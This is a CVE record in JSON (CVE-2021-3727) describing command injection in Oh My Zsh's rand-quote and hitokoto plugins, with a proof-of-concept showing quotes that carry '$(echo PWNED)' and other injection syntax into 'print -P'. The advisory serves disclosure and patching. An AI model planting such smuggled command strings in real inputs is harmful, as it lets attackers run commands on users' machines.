Show plain JSON{"containers": {"cna": {"affected": [{"product": "ohmyzsh/ohmyzsh", "vendor": "ohmyzsh", "versions": [{"lessThan": "72928432", "status": "affected", "version": "unspecified", "versionType": "custom"}]}], "descriptions": [{"lang": "en", "value": "# Vulnerability in `rand-quote` and `hitokoto` plugins **Description**: the `rand-quote` and `hitokoto` fetch quotes from quotationspage.com and hitokoto.cn respectively, do some process on them and then use `print -P` to print them. If these quotes contained the proper symbols, they could trigger command injection. Given that they're an external API, it's not possible to know if the quotes are safe to use. **Fixed in**: [72928432](https://github.com/ohmyzsh/ohmyzsh/commit/72928432). **Impacted areas**: - `rand-quote` plugin (`quote` function). - `hitokoto` plugin (`hitokoto` function)."}], "exploits": [{"lang": "en", "value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `rand-quote` or `hitokoto` plugins.\n3. Optional: run `quote` or `hitokoto` functions in a precmd hook:\n\n ```zsh\n add-zsh-hook precmd quote\n add-zsh-hook precmd hitokoto\n ```\n\n4. Wait until a quote from either `quotationspage.com` or `hitokoto.cn` contains either\n `$(<injected-command>`, <code>\\`\\<injected-command\\>\\`</code> or `${(e):-\"<injected-command>\"}`.\n\n - For the `rand-quote` plugin, this is how a malicious quote would look like (note the `$(echo PWNED)` part):\n\n ```plain\n ...\n <p>The following quotations were randomly selected from the collections selected below .</p><dl><dt class=\"quote\"><a title=\"Click for further information about this quotation\" href=\"/quote/31081.html\">Whatever you fear most has no power$(echo PWNED) - it is your fear that has the power.</a> </dt><dd class=\"author\"><div class=\"icons\"><a title=\"Further information about this quotation\" href=\"/quote/31081.html\"><img src=\"/icon_info.gif\" width=\"16\" height=\"16\" alt=\"[info]\" border=\"0\"></a><a title=\"Add to Your Quotations Page\" href=\"/myquotations.php?add=31081\"><img src=\"/icon_plus.gif\" width=\"16\" height=\"16\" alt=\"[add]\" border=\"0\"></a><a title=\"Email this quotation\" href=\"/quote/31081.html#email\"><img src=\"/icon_email.gif\" width=\"16\" height=\"16\" alt=\"[mail]\" border=\"0\"></a><img src=\"/icon_blank.gif\" width=\"16\" height=\"16\" alt=\"\" border=\"0\"></div><b><a href=\"/quotes/Oprah_Winfrey/\">Oprah Winfrey</a> (1954 - )</b>, <i>O Magazine</i></dd>\n ...\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ quote\n Oprah Winfrey: \u201cWhatever you fear most has no powerPWNED - it is your fear that has the power.\u201d\n ```\n\n Note that it's possible to submit your own quotes to quotationspage.com so this could be possible if moderators missed it.\n\n - For the `hitokoto` plugin, this is an example of a malicious quote (note the `$(echo PWNED)` part):\n\n ```plain\n {\"id\":7474,\"uuid\":\"0467d7cf-bca2-4cee-81ab-0b0640e51069\",\"hitokoto\":\"\u5979\u62e8\u5f04\u7434\u5f26\uff0c$(echo PWNED)\u626c\u8d77\u6f6e\u6c50\u3002\",\"type\":\"e\",\"from\":\"\u539f\u521b\",\"from_who\":\"\u6211\",\"creator\":\"\u9e22\u5c3e\",\"creator_uid\":9969,\"reviewer\":4756,\"commit_from\":\"web\",\"created_at\":\"1627968443\",\"length\":11}\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ hitokoto\n \u539f\u521b: \u201c\u5979\u62e8\u5f04\u7434\u5f26\uff0cPWNED\u626c\u8d77\u6f6e\u6c50\u3002\u201d\n ```\n\n `hitokoto.cn` also allows adding quotes to the database, so this could also be possible.\n"}], "metrics": [{"cvssV3_1": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}}], "problemTypes": [{"descriptions": [{"cweId": "CWE-78", "description": "CWE-78 OS Command Injection", "lang": "en", "type": "CWE"}]}], "providerMetadata": {"dateUpdated": "2021-11-30T09:30:17", "orgId": "c09c270a-b464-47c1-9133-acb35b22c19a", "shortName": "@huntrdev"}, "references": [{"tags": ["x_refsource_MISC"], "url": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432"}], "title": "OS Command Injection in ohmyzsh/ohmyzsh", "x_legacyV4Record": {"CVE_data_meta": {"ASSIGNER": "security@huntr.dev", "ID": "CVE-2021-3727", "STATE": "PUBLIC", "TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"}, "affects": {"vendor": {"vendor_data": [{"product": {"product_data": [{"product_name": "ohmyzsh/ohmyzsh", "version": {"version_data": [{"version_affected": "<", "version_value": "72928432"}]}}]}, "vendor_name": "ohmyzsh"}]}}, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": {"description_data": [{"lang": "eng", "value": "# Vulnerability in `rand-quote` and `hitokoto` plugins **Description**: the `rand-quote` and `hitokoto` fetch quotes from quotationspage.com and hitokoto.cn respectively, do some process on them and then use `print -P` to print them. If these quotes contained the proper symbols, they could trigger command injection. Given that they're an external API, it's not possible to know if the quotes are safe to use. **Fixed in**: [72928432](https://github.com/ohmyzsh/ohmyzsh/commit/72928432). **Impacted areas**: - `rand-quote` plugin (`quote` function). - `hitokoto` plugin (`hitokoto` function)."}]}, "exploit": [{"lang": "en", "value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `rand-quote` or `hitokoto` plugins.\n3. Optional: run `quote` or `hitokoto` functions in a precmd hook:\n\n ```zsh\n add-zsh-hook precmd quote\n add-zsh-hook precmd hitokoto\n ```\n\n4. Wait until a quote from either `quotationspage.com` or `hitokoto.cn` contains either\n `$(<injected-command>`, <code>\\`\\<injected-command\\>\\`</code> or `${(e):-\"<injected-command>\"}`.\n\n - For the `rand-quote` plugin, this is how a malicious quote would look like (note the `$(echo PWNED)` part):\n\n ```plain\n ...\n <p>The following quotations were randomly selected from the collections selected below .</p><dl><dt class=\"quote\"><a title=\"Click for further information about this quotation\" href=\"/quote/31081.html\">Whatever you fear most has no power$(echo PWNED) - it is your fear that has the power.</a> </dt><dd class=\"author\"><div class=\"icons\"><a title=\"Further information about this quotation\" href=\"/quote/31081.html\"><img src=\"/icon_info.gif\" width=\"16\" height=\"16\" alt=\"[info]\" border=\"0\"></a><a title=\"Add to Your Quotations Page\" href=\"/myquotations.php?add=31081\"><img src=\"/icon_plus.gif\" width=\"16\" height=\"16\" alt=\"[add]\" border=\"0\"></a><a title=\"Email this quotation\" href=\"/quote/31081.html#email\"><img src=\"/icon_email.gif\" width=\"16\" height=\"16\" alt=\"[mail]\" border=\"0\"></a><img src=\"/icon_blank.gif\" width=\"16\" height=\"16\" alt=\"\" border=\"0\"></div><b><a href=\"/quotes/Oprah_Winfrey/\">Oprah Winfrey</a> (1954 - )</b>, <i>O Magazine</i></dd>\n ...\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ quote\n Oprah Winfrey: \u201cWhatever you fear most has no powerPWNED - it is your fear that has the power.\u201d\n ```\n\n Note that it's possible to submit your own quotes to quotationspage.com so this could be possible if moderators missed it.\n\n - For the `hitokoto` plugin, this is an example of a malicious quote (note the `$(echo PWNED)` part):\n\n ```plain\n {\"id\":7474,\"uuid\":\"0467d7cf-bca2-4cee-81ab-0b0640e51069\",\"hitokoto\":\"\u5979\u62e8\u5f04\u7434\u5f26\uff0c$(echo PWNED)\u626c\u8d77\u6f6e\u6c50\u3002\",\"type\":\"e\",\"from\":\"\u539f\u521b\",\"from_who\":\"\u6211\",\"creator\":\"\u9e22\u5c3e\",\"creator_uid\":9969,\"reviewer\":4756,\"commit_from\":\"web\",\"created_at\":\"1627968443\",\"length\":11}\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ hitokoto\n \u539f\u521b: \u201c\u5979\u62e8\u5f04\u7434\u5f26\uff0cPWNED\u626c\u8d77\u6f6e\u6c50\u3002\u201d\n ```\n\n `hitokoto.cn` also allows adding quotes to the database, so this could also be possible.\n"}], "impact": {"cvss": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}}, "problemtype": {"problemtype_data": [{"description": [{"lang": "eng", "value": "CWE-78 OS Command Injection"}]}]}, "references": {"reference_data": [{"name": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432", "refsource": "MISC", "url": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432"}]}}}, "adp": [{"providerMetadata": {"orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE", "dateUpdated": "2024-08-03T17:01:08.331Z"}, "title": "CVE Program Container", "references": [{"tags": ["x_refsource_MISC", "x_transferred"], "url": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432"}]}]}, "cveMetadata": {"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a", "assignerShortName": "@huntrdev", "cveId": "CVE-2021-3727", "datePublished": "2021-11-30T09:30:17", "dateReserved": "2021-08-19T00:00:00", "dateUpdated": "2024-08-03T17:01:08.331Z", "state": "PUBLISHED"}, "dataType": "CVE_RECORD", "dataVersion": "5.1"} 
ReportizFlow
Vulnrichment
Redhat